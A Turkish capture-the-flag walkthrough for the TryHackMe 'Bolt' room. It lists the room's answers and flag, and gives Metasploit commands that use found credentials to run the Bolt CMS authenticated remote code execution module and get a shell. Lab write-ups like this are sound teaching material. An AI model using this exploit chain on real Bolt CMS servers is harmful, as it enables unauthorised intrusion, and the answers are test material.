- 6 May 2022
- 124
- 79
Öncelikle Herkese Merhaba Bugün Sizlerle "Bolt" İsimli Ctfyi çözeceğiz
LİNK = TryHackMe | Bolt
1.sorumuz "CMS'nin çalıştığı bir web sunucusu hangi bağlantı noktası numarasına sahiptir?"
Bunu çözebilmek için bir nmap taraması yapmamız gerekli
3 tane açık port çıktı 22.port (ssh portu) 80.port (internet erişim protokolü HTTP (Hypertext Transfer Protocol) için kullanılan bir bağlantı noktası portudur.)
geriye 8000 port kalıyor demekki cmsnin çalıştığı port buymuş. biz genede bunu kontrol edelim diyerek siteyi 8000.portta çalıştırıyoruz
ve tahminimiz doğru çıkıyor
2.sorumuz "CMS'de bulabileceğimiz kullanıcı adı nedir?"
bu soruyu cevaplamak için sitede 8000.portta biraz geziniyoruz ve aşağıda adminin bıratığı notlarda usernameyi görüyoruz
CEVAP : bolt
3.sorumuz "Kullanıcı adı için bulabileceğimiz şifre nedir ?"
bunun için 8000.portta biraz daha geziyoruz ve bir admin mesajına daha denk geliyoruz ve mesajda şifreyi görüyoruz
CEVAP = boltadmin123
4.sorumuz "Sunucuda cmsnin hangi sürümü yüklü? (Örn: İsim 1.1.1)"
bunu bulamımızın en kolay yolu admin panele giriş yapmak bunun için internette araştırıyoruz ve admin panele girebilmemimiz için /bolt yazmamız gerektiğini öğreniyoruz
ÖRNEK = http://<TARGET İP>:8000/bolt
ve admin panele geliyoruz bulduğumuz username ile passwordu giriyoruz
ve giriş yapıyoruz
ve sol aşağıda sürümünü görüyoruz
CEVAP = Bolt 3.7.1
5.sorumuz "Bu cms'nin önceki bir sürümü için authenticated RCE'ye izin veren bir istismar var. Exploit DB'de bulun. EDB-ID'si nedir?"
internete "bolt authenticated rce exploit db" yazıyoruz ve ilk sırada Bolt CMS 3.7.0 - Authenticated Remote Code Execution bu linkle karşılaşıyoruz
giriyoruz ve yukarda EDB-ID'sini görüyoruz
CEVAP = 48296
Metasploite giriyoruz ve "search bolt" yazıyoruz ve karşımıza iki adet exploit çıkıyor bunlardan sitemize uygun olan exploit "exploit/unix/webapp/bolt_authenticated_rce" budur description kısmından anlayacağınız üzere.
CEVAP = exploit/unix/webapp/bolt_authenticated_rce
6.sorumuz "Makinenin içinde flag.txt dosyasını arayın."
bunun için makineye sızmamız gerekli ve metasploite girip "use exploit/unix/webapp/bolt_authenticated_rce" yazıp exploitimizi seçiyoruz
"set PASSWORD boltadmin123" yazarak şifremizi kaydediyoruz
"set USERNAME bolt" yazarak usernamemizi kaydediyoruz
"set RHOSTS <TARGET İP>" yazarak hedef makinemizi seçiyoruz
"set LHOST <İP ADRESİNİZ>" yazıyoruz
ve "run" veya "exploit" yazarak sızma işlememizi gerçekleştiriyoruz
şimdi makinede flagımızı arıyabiliriz
"cd /home" yazarak en başa geliyoruz ve "ls" komutu ile 3 dosya görüyoruz
flag.txt yi cat toolü ile açıyoruz "cat flag.txt" yazıyoruz ve flagımızı görüyoruz
CEVAP = THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
İyi Günler Dilerim